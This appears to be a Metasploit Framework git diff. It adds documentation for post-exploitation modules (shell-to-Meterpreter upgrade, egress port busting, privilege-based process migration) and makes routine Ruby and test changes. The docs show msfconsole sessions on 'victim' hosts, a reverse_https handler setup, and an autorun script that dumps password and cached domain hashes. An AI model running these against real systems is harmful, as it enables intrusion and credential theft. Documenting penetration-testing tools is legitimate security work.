To upgrade box B's shell, set LHOST to box A's VPN address, 192.168.1.101, and that should connect correctly:
|
||||
|
||||
```
|
||||
msf post(shell_to_meterpreter) > run
|
||||
|
||||
[*] Upgrading session ID: 2
|
||||
[*] Starting exploit/multi/handler
|
||||
[*] Started reverse TCP handler on 192.168.1.101:4433 via the meterpreter on session 1
|
||||
[*] Starting the payload handler...
|
||||
[*] Sending stage (957999 bytes) to 192.168.1.102
|
||||
[-] Powershell is not installed on the target.
|
||||
[*] Command stager progress: 1.66% (1699/102108 bytes)
|
||||
...
|
||||
[*] Command stager progress: 100.00% (102108/102108 bytes)
|
||||
[*] Meterpreter session 3 opened (192.168.146.1-192.168.146.128:4433 -> 192.168.1.102:1056) at 2016-04-28 22:50:56 -0500
|
||||
```
|
|
@ -0,0 +1,226 @@
|
|||
This is a Meterpreter post exploitation module that will generate TCP and UDP packets on a range of ports and send them to a provided IP address. Its primary purpose is 'egress busting': it provides a rapid method of generating legitimate TCP or UDP traffic on each port. This is useful for red-team type exercises in which you have Meterpreter running on a host but wish to determine additional ports over which egress traffic is permitted.
|
||||
|
||||
It can generate the packets in two different ways; it can call the Windows sockets API (using railgun for Windows clients) or it can create the packets using Rex.
|
||||
|
||||
NATIVE mode uses Rex sockets to generate traffic.
|
||||
WINAPI mode uses Winsock APIs to generate traffic.
|
||||
|
||||
As it currently stands, the user will need to set up a listener/tcpdump/wireshark to determine the ports that are open. My [egresscheck-framework](https://github.com/stufus/egresscheck-framework) code can help with that, but any listener would be fine.
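On the receiving side, something as simple as tcpdump is enough; a minimal sketch for the Windows example below (the interface name is a placeholder):

```
# on the attacker (192.0.2.1), watch for the generated test traffic from the victim
sudo tcpdump -ni eth0 'host 192.0.2.104 and (tcp or udp)'
```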
|
||||
|
||||
# Example - Windows Meterpreter
|
||||
|
||||
Scenario is:
|
||||
|
||||
* The victim host is 192.0.2.104
|
||||
* The attacker is 192.0.2.1
|
||||
* The attacker wishes to generate TCP packets to 192.0.2.1 (with meterpreter on 192.0.2.104) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1.
|
||||
* The compromised machine is a Windows 8.1 machine
|
||||
|
||||
```
|
||||
msf> sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
2 meterpreter x86/win32 TESTER\Stuart @ TESTER 192.0.2.1:9877 -> 192.0.2.104:43595 (192.0.2.104)
|
||||
|
||||
msf> set METHOD NATIVE
|
||||
METHOD => NATIVE
|
||||
msf> set PORTS 22,23,53,80,88,443,445
|
||||
PORTS => 22,23,53,80,88,443,445
|
||||
msf> set PROTOCOL TCP
|
||||
PROTOCOL => TCP
|
||||
msf> set SESSION 2
|
||||
SESSION => 2
|
||||
msf> set TARGET 192.0.2.1
|
||||
TARGET => 192.0.2.1
|
||||
msf> set THREADS 3
|
||||
THREADS => 3
|
||||
msf> show options
|
||||
|
||||
Module options (post/multi/manage/multiport_egress_traffic):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI)
|
||||
PORTS 22,23,53,80,88,443,445 yes Ports to test.
|
||||
PROTOCOL TCP yes Protocol to use. (Accepted: TCP, UDP)
|
||||
SESSION 2 yes The session to run this module on.
|
||||
TARGET 192.0.2.1 yes Destination IP address.
|
||||
THREADS 3 yes Number of simultaneous threads/connections to try.
|
||||
|
||||
msf> run
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
msf> set VERBOSE TRUE
|
||||
VERBOSE => TRUE
|
||||
msf> run
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
Here is an example with the METHOD parameter set to WINAPI:
|
||||
|
||||
```
|
||||
msf> set METHOD WINAPI
|
||||
METHOD => WINAPI
|
||||
msf> run
|
||||
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/53 (Handle: 14908)
|
||||
[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/23 (Handle: 14856)
|
||||
[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/53
|
||||
[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/23
|
||||
[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/22 (Handle: 14300)
|
||||
[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/22
|
||||
[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 53) Error: 10061
|
||||
[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 22) Error: 10061
|
||||
[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 23) Error: 10061
|
||||
[*] [1:WINAPI] Set up socket for 192.0.2.1 port TCP/88 (Handle: 13868)
|
||||
[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/80 (Handle: 14300)
|
||||
[*] [1:WINAPI] Connecting to 192.0.2.1:TCP/88
|
||||
[*] [2:WINAPI] Set up socket for 192.0.2.1 port TCP/443 (Handle: 14908)
|
||||
[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/80
|
||||
[*] [2:WINAPI] Connecting to 192.0.2.1:TCP/443
|
||||
[*] [1:WINAPI] There was an error sending a connect packet for TCP socket (port 88) Error: 10061
|
||||
[*] [2:WINAPI] There was an error sending a connect packet for TCP socket (port 443) Error: 10061
|
||||
[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 80) Error: 10061
|
||||
[*] [0:WINAPI] Set up socket for 192.0.2.1 port TCP/445 (Handle: 13868)
|
||||
[*] [0:WINAPI] Connecting to 192.0.2.1:TCP/445
|
||||
[*] [0:WINAPI] There was an error sending a connect packet for TCP socket (port 445) Error: 10061
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
UDP also works correctly:
|
||||
|
||||
```
|
||||
msf> set PROTOCOL UDP
|
||||
PROTOCOL => UDP
|
||||
msf> set METHOD NATIVE
|
||||
METHOD => NATIVE
|
||||
msf> show options
|
||||
|
||||
Module options (post/multi/manage/multiport_egress_traffic):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI)
|
||||
PORTS 22,23,53,80,88,443,445 yes Ports to test.
|
||||
PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP)
|
||||
SESSION 2 yes The session to run this module on.
|
||||
TARGET 192.0.2.1 yes Destination IP address.
|
||||
THREADS 3 yes Number of simultaneous threads/connections to try.
|
||||
|
||||
msf> run
|
||||
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating UDP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445
|
||||
[*] UDP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
Note that the errors shown in verbose mode are normal; they occur because there is nothing actually listening on any of those ports, so the connection calls fail.
|
||||
|
||||
Running tcpdump on 192.0.2.1 showed all the connection attempts as normal.
|
||||
|
||||
# Example - Linux Meterpreter
|
||||
|
||||
Scenario is:
|
||||
|
||||
* The victim host is 192.0.2.103
|
||||
* The attacker is 192.0.2.1
|
||||
* The attacker wishes to generate TCP packets to 192.0.2.1 (with linux meterpreter on 192.0.2.103) on ports 22,23,53,80,88,443 and 445 to see if any of the packets reach 192.0.2.1. Note that the attacker has control of 192.0.2.1.
|
||||
* The compromised machine is a Linux machine (running Kali)
|
||||
|
||||
```
|
||||
msf> sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
4 meterpreter x86/linux uid=1000, gid=1001, euid=1000, egid=1001, suid=1000, sgid=1001 @ kali 192.0.2.1:4322 -> 192.0.2.103:37489 (192.0.2.103)
|
||||
|
||||
msf> run
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating TCP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/22
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/23
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port TCP/88
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/53
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port TCP/443
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/22
|
||||
[*] [1:NATIVE] Error connecting to 192.0.2.1 TCP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/80
|
||||
[*] [2:NATIVE] Error connecting to 192.0.2.1 TCP/443
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/80
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port TCP/445
|
||||
[*] [0:NATIVE] Error connecting to 192.0.2.1 TCP/445
|
||||
[*] TCP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
msf> set PROTOCOL UDP
|
||||
PROTOCOL => UDP
|
||||
msf> run
|
||||
[*] Number of threads: 3.
|
||||
[*] Generating UDP traffic to 192.0.2.1...
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/23
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/53
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/22
|
||||
[*] [2:NATIVE] Connecting to 192.0.2.1 port UDP/443
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/80
|
||||
[*] [1:NATIVE] Connecting to 192.0.2.1 port UDP/88
|
||||
[*] [0:NATIVE] Connecting to 192.0.2.1 port UDP/445
|
||||
[*] UDP traffic generation to 192.0.2.1 completed.
|
||||
[*] Post module execution completed
|
||||
msf> show options
|
||||
|
||||
Module options (post/multi/manage/multiport_egress_traffic):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
METHOD NATIVE yes The mechanism by which the packets are generated. Can be NATIVE or WINAPI (Windows only). (Accepted: NATIVE, WINAPI)
|
||||
PORTS 22,23,53,80,88,443,445 yes Ports to test.
|
||||
PROTOCOL UDP yes Protocol to use. (Accepted: TCP, UDP)
|
||||
SESSION 4 yes The session to run this module on.
|
||||
TARGET 192.0.2.1 yes Destination IP address.
|
||||
THREADS 3 yes Number of simultaneous threads/connections to try.
|
||||
|
||||
msf>
|
||||
```
|
||||
|
||||
![msfegress_tcpdump_udp](https://cloud.githubusercontent.com/assets/12296344/11459958/a7862f22-96da-11e5-86a2-31a4c0153944.png)
|
||||
|
||||
# Future Work
|
||||
|
||||
This module did not appear to work with Python Meterpreter.
|
|
@ -0,0 +1,67 @@
|
|||
## Overview
|
||||
This module evaluates a Windows Meterpreter session's privileges and migrates the session accordingly. The purpose of this module is to enable the scripting of migrations post exploitation, which allows you to immediately run post modules that require system rights.
|
||||
|
||||
You can use this module in situations where incoming sessions may have mixed rights levels and the session needs to be migrated appropriately for additional post modules to run. It is also useful in situations where migration needs to occur within a short period after the session is created.
|
||||
|
||||
The types of migrations that occur are described below:
|
||||
|
||||
- A session with admin rights is migrated to a system owned process.
|
||||
- A session with user rights is migrated to a user level process. If a specified user level process is not running, the module will spawn it and then migrate the session.
|
||||
|
||||
This module is a nice addition to the beginning of an autorun script that runs after a Meterpreter session is created. An example of an autorun script is provided below.
|
||||
|
||||
## Module Options
|
||||
- **ANAME** - This option allows you to specify a system level process that the module attempts to migrate to first if the session has admin rights.
|
||||
- **NAME** - This option allows you to specify the user level process that the module attempts to migrate to first if the session has user rights or if admin migration fails through all of the default processes.
|
||||
- **KILL** - This option allows you to kill the original process after a successful migration. The default value is FALSE.
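A minimal console run that exercises these options (the session ID is a placeholder):

```
msf > use post/windows/manage/priv_migrate
msf post(priv_migrate) > set SESSION 1
msf post(priv_migrate) > set KILL true
msf post(priv_migrate) > run
```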
|
||||
|
||||
## Module Process
|
||||
Here is the process that the module follows:
|
||||
|
||||
- Retrieves the privilege information for the current session.
|
||||
- If the session has admin rights, it attempts to migrate to a system owned process in the following order:
|
||||
- ANAME (Module option, if specified)
|
||||
- services.exe
|
||||
- winlogon.exe
|
||||
- wininit.exe
|
||||
- lsm.exe
|
||||
- lsass.exe
|
||||
- If it is unable to migrate to one of these processes, it drops to user level migration.
|
||||
- If the session has user rights, it attempts to migrate to a user owned process in the following order:
|
||||
- NAME (Module option, if specified)
|
||||
- explorer.exe
|
||||
- notepad.exe
|
||||
- If it cannot migrate, it attempts to spawn the process and migrates to the newly spawned process.
|
||||
|
||||
## Using This Module with AutoRun Scripts
|
||||
The use of autorun scripts with this module is an easy way to automate post-exploitation for incoming Meterpreter sessions. The following section describes the basic setup information and provides a script example to show how this module comes in handy.
|
||||
|
||||
### Basic Setup Information
|
||||
Resource file (.rc) scripts can be used to automate many processes in Metasploit, particularly starting up the console and running scripts once a session is created.
|
||||
|
||||
Startup scripts are executed as shown in the following example, where startup.rc is the startup script located in the user's home directory. Startup scripts run once the Metasploit Framework is loaded.
|
||||
|
||||
```
|
||||
./msfconsole -r /home/user/startup.rc
|
||||
```
|
||||
|
||||
The following is an example startup script that fires up a Meterpreter listener and specifies an autorun script that will be executed when a new session is created. In this example auto.rc is the script to be run after session creation.
|
||||
|
||||
```
|
||||
use exploit/multi/handler
|
||||
set PAYLOAD windows/meterpreter/reverse_https
|
||||
set LHOST 192.168.1.101
|
||||
set LPORT 13002
|
||||
set ExitOnSession false
|
||||
set AutoRunScript multi_console_command -rc /home/user/auto.rc
|
||||
exploit -j
|
||||
```
|
||||
|
||||
### AutoRun Script Example
|
||||
This example is a script that will use priv_migrate to migrate the session based on session rights. After migration, it executes modules that will retrieve user password hashes and cached domain hashes. Each one of the hash dump modules requires system rights to be successful. Priv_migrate makes it possible to execute these modules in an autorun script. For sessions with user rights, the hash dump modules will fail, but that is unlikely to impact the state of the session.
|
||||
|
||||
```
|
||||
run post/windows/manage/priv_migrate
|
||||
run post/windows/gather/hashdump
|
||||
run post/windows/gather/cachedump
|
||||
```
|
|
@ -48,7 +48,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
|
||||
Then the output should contain "command_line_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
|
||||
|
@ -82,7 +82,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "environment_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
|
||||
|
@ -109,7 +109,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "user_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
|
||||
|
@ -127,7 +127,7 @@ Feature: `msfconsole` `database.yml`
|
|||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "project_metasploit_framework_test"
|
||||
|
||||
|
||||
|
@ -140,7 +140,7 @@ Feature: `msfconsole` `database.yml`
|
|||
And a mocked home directory
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" does not exist
|
||||
When I run `msfconsole --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should not contain "command_line_metasploit_framework_test"
|
||||
And the output should not contain "environment_metasploit_framework_test"
|
||||
And the output should not contain "user_metasploit_framework_test"
|
||||
|
@ -148,6 +148,6 @@ Feature: `msfconsole` `database.yml`
|
|||
And the output should contain "[*] postgresql selected, no connection"
|
||||
|
||||
Scenario: Starting `msfconsole` with a valid database.yml
|
||||
When I run `msfconsole --defer-module-loads --execute-command db_status --execute-command exit`
|
||||
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "[*] postgresql connected to metasploit_framework_test"
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@ end
|
|||
|
||||
Given /^the project "database.yml" exists with:$/ do |file_content|
|
||||
Metasploit::Framework::Database::Cucumber.backup_project_configurations
|
||||
write_file(Metasploit::Framework::Database::Cucumber.project_configurations_path, file_content)
|
||||
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
|
||||
end
|
||||
|
||||
After do
|
||||
|
|
|
@ -5,30 +5,30 @@ Before do
|
|||
end
|
||||
|
||||
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
|
||||
unless Bundler.settings.without.include?(:coverage)
|
||||
Before do |scenario|
|
||||
command_name = case scenario
|
||||
when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
|
||||
"#{scenario.feature.title} #{scenario.name}"
|
||||
when Cucumber::Ast::OutlineTable::ExampleRow
|
||||
scenario_outline = scenario.scenario_outline
|
||||
|
||||
"#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
|
||||
else
|
||||
raise TypeError, "Don't know how to extract command name from #{scenario.class}"
|
||||
end
|
||||
|
||||
# Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
|
||||
# of overwriting each other as 'Cucumber Features'
|
||||
set_env('SIMPLECOV_COMMAND_NAME', command_name)
|
||||
|
||||
simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
|
||||
# set environment variable so child processes will merge their coverage data with parent process's coverage data.
|
||||
set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
|
||||
end
|
||||
|
||||
Before('@db') do |scenario|
|
||||
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
end
|
||||
end
|
||||
# unless Bundler.settings.without.include?(:coverage)
|
||||
# Before do |scenario|
|
||||
# command_name = case scenario
|
||||
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
|
||||
# "#{scenario.feature.title} #{scenario.name}"
|
||||
# when Cucumber::Ast::OutlineTable::ExampleRow
|
||||
# scenario_outline = scenario.scenario_outline
|
||||
#
|
||||
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
|
||||
# else
|
||||
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
|
||||
# end
|
||||
#
|
||||
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
|
||||
# # of overwriting each other as 'Cucumber Features'
|
||||
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
|
||||
#
|
||||
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
|
||||
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
|
||||
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
|
||||
# end
|
||||
#
|
||||
# Before('@db') do |scenario|
|
||||
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
# ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
# end
|
||||
# end
|
||||
|
|
|
@ -9,7 +9,7 @@ module Anemone
|
|||
def_delegators :@keys, :has_key?, :keys, :size
|
||||
|
||||
def initialize(file)
|
||||
File.delete(file) if File.exists?(file)
|
||||
File.delete(file) if File.exist?(file)
|
||||
@store = ::PStore.new(file)
|
||||
@keys = {}
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module Metasploit
|
|||
|
||||
# This class is responsible for taking datastore options from the snmp_login module
|
||||
# and yielding appropriate {Metasploit::Framework::Credential}s to the {Metasploit::Framework::LoginScanner::SNMP}.
|
||||
# This one has to be different from {credentialCollection} as it will only have a {Metasploit::Framework::Credential#public}
|
||||
# This one has to be different from credentialCollection as it will only have a {Metasploit::Framework::Credential#public}
|
||||
# It may be slightly confusing that the attribues are called password and pass_file, because this is what the legacy
|
||||
# module used. However, community Strings are now considered more to be public credentials than private ones.
|
||||
class CommunityStringCollection
|
||||
|
|
|
@ -18,10 +18,10 @@ module Metasploit
|
|||
# Module Methods
|
||||
#
|
||||
|
||||
# Returns first configuration pathname from {configuration_pathnames} or the overridding `:path`.
|
||||
# Returns first configuration pathname from configuration_pathnames or the overridding `:path`.
|
||||
#
|
||||
# @param options [Hash{Symbol=>String}]
|
||||
# @option options [String] :path Path to use instead of first element of {configurations_pathnames}
|
||||
# @option options [String] :path Path to use instead of first element of configurations_pathnames
|
||||
# @return [Pathname] if configuration pathname exists.
|
||||
# @return [nil] if configuration pathname does not exist.
|
||||
def self.configurations_pathname(options={})
|
||||
|
|
|
@ -29,7 +29,7 @@ module Metasploit
|
|||
|
||||
# Returns the latest sid from MSP
|
||||
#
|
||||
# @param [Rex::Proto::Http::Response]
|
||||
# @param res [Rex::Proto::Http::Response]
|
||||
# @return [String] The session ID for MSP
|
||||
def get_sid(res)
|
||||
cookies = res.get_cookies
|
||||
|
@ -41,7 +41,7 @@ module Metasploit
|
|||
|
||||
# Returns the hidden inputs
|
||||
#
|
||||
# @param [Rex::Proto::Http::Response]
|
||||
# @param res [Rex::Proto::Http::Response]
|
||||
# @return [Hash] Input fields
|
||||
def get_hidden_inputs(res)
|
||||
found_inputs = {}
|
||||
|
|
|
@ -60,7 +60,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
# Attempt to login with every {Credential credential} in # {#cred_details}.
|
||||
# Attempt to login with every {Credential credential} in # #cred_details.
|
||||
#
|
||||
# @yieldparam result [Result] The {Result} object for each attempt
|
||||
# @yieldreturn [void]
|
||||
|
|
|
@ -5,7 +5,7 @@ module Metasploit
|
|||
module RailsVersionConstraint
|
||||
|
||||
# The Metasploit ecosystem is not yet ready for Rails 4.1:
|
||||
RAILS_VERSION = [ '>= 4.0.9', '< 4.1.0' ]
|
||||
RAILS_VERSION = '~> 4.2.6'
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -42,7 +42,7 @@ module Metasploit::Framework::Spec::Constants
|
|||
# Adds actions to `spec` task so that `rake spec` fails if any of the following:
|
||||
#
|
||||
# # `log/leaked-constants.log` exists after printing out the leaked constants.
|
||||
# # {Each.configured!} is unnecessary in `spec/spec_helper.rb` and should be removed.
|
||||
# # Each.configured! is unnecessary in `spec/spec_helper.rb` and should be removed.
|
||||
#
|
||||
# @return [void]
|
||||
def self.define_task
|
||||
|
@ -96,4 +96,4 @@ module Metasploit::Framework::Spec::Constants
|
|||
|
||||
full_name
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -19,7 +19,7 @@ module Metasploit::Framework::Spec::Constants::Each
|
|||
attr_accessor :leaks_cleaned
|
||||
end
|
||||
|
||||
# Is {Metasploit::Framework::Spec::Constants::Each.configure!} still necessary or should it be removed?
|
||||
# Is Metasploit::Framework::Spec::Constants::Each.configure! still necessary or should it be removed?
|
||||
#
|
||||
# @return [true] if {configure!}'s `before(:each)` cleaned up leaked constants
|
||||
# @return [false] otherwise
|
||||
|
@ -91,7 +91,7 @@ module Metasploit::Framework::Spec::Constants::Each
|
|||
!!@configured
|
||||
end
|
||||
|
||||
# Adds action to `spec` task so that `rake spec` fails if {configured!} is unnecessary in `spec/spec_helper.rb` and
|
||||
# Adds action to `spec` task so that `rake spec` fails if configured! is unnecessary in `spec/spec_helper.rb` and
|
||||
# should be removed
|
||||
#
|
||||
# @return [void]
|
||||
|
@ -116,4 +116,4 @@ module Metasploit::Framework::Spec::Constants::Each
|
|||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,7 +6,7 @@ module Metasploit::Framework::Spec::Constants::Suite
|
|||
|
||||
LOGS_PATHNAME = Pathname.new('log/metasploit/framework/spec/constants/suite')
|
||||
|
||||
# Logs leaked constants to {LOG_PATHNAME} and prints `message` to stderr.
|
||||
# Logs leaked constants to LOG_PATHNAME and prints `message` to stderr.
|
||||
#
|
||||
# @param hook (see log_pathname)
|
||||
# @param message [String] additional message printed to stderr when there is at least one leaked constant.
|
||||
|
@ -116,4 +116,4 @@ module Metasploit::Framework::Spec::Constants::Suite
|
|||
|
||||
leaks
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# Wraps {Msf::Framework} so that {Msf::Framework#threads} is only created on the first call to {#spawn} by
|
||||
# {Rex::ThreadFactory#spawn}, which allows the threads used by {Msf::ThreadManager} to be created lazily.
|
||||
# Rex::ThreadFactory#spawn, which allows the threads used by {Msf::ThreadManager} to be created lazily.
|
||||
#
|
||||
# @example Setting Rex::ThreadFactory.provider and spawning threads
|
||||
# Rex::ThreadFactory.provider = Metasploit::Framework::ThreadFactoryProvider.new(framework: framework)
|
||||
|
@ -23,4 +23,4 @@ class Metasploit::Framework::ThreadFactoryProvider < Metasploit::Model::Base
|
|||
def spawn(name, critical, *args, &block)
|
||||
framework.threads.spawn(name, critical, *args, &block)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.11.22"
|
||||
VERSION = "4.12.7"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
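For the new version string the split works out to:

"4.12.7".split('.').map { |x| x.to_i }  # => [4, 12, 7]  (MAJOR, MINOR, PATCH)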
|
||||
|
|
|
@ -471,7 +471,7 @@ class ReadableText
|
|||
def self.dump_references(mod, indent = '')
|
||||
output = ''
|
||||
|
||||
if (mod.respond_to? :references and mod.references and mod.references.length > 0)
|
||||
if (mod.respond_to?(:references) && mod.references && mod.references.length > 0)
|
||||
output << "References:\n"
|
||||
mod.references.each { |ref|
|
||||
output << indent + ref.to_s + "\n"
|
||||
|
@ -510,19 +510,14 @@ class ReadableText
|
|||
#
|
||||
# @param framework [Msf::Framework] the framework to dump.
|
||||
# @param opts [Hash] the options to dump with.
|
||||
# @option opts :session_ids [Array] the list of sessions to dump (no
|
||||
# effect).
|
||||
# @option opts :verbose [Boolean] gives more information if set to
|
||||
# true.
|
||||
# @option opts :indent [Integer] set the indentation amount.
|
||||
# @option opts :col [Integer] the column wrap width.
|
||||
# @return [String] the formatted list of sessions.
|
||||
def self.dump_sessions(framework, opts={})
|
||||
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
||||
verbose = opts[:verbose] || false
|
||||
show_extended = opts[:show_extended] || false
|
||||
indent = opts[:indent] || DefaultIndent
|
||||
col = opts[:col] || DefaultColumnWrap
|
||||
|
||||
return dump_sessions_verbose(framework, opts) if verbose
|
||||
|
||||
|
@ -530,6 +525,7 @@ class ReadableText
|
|||
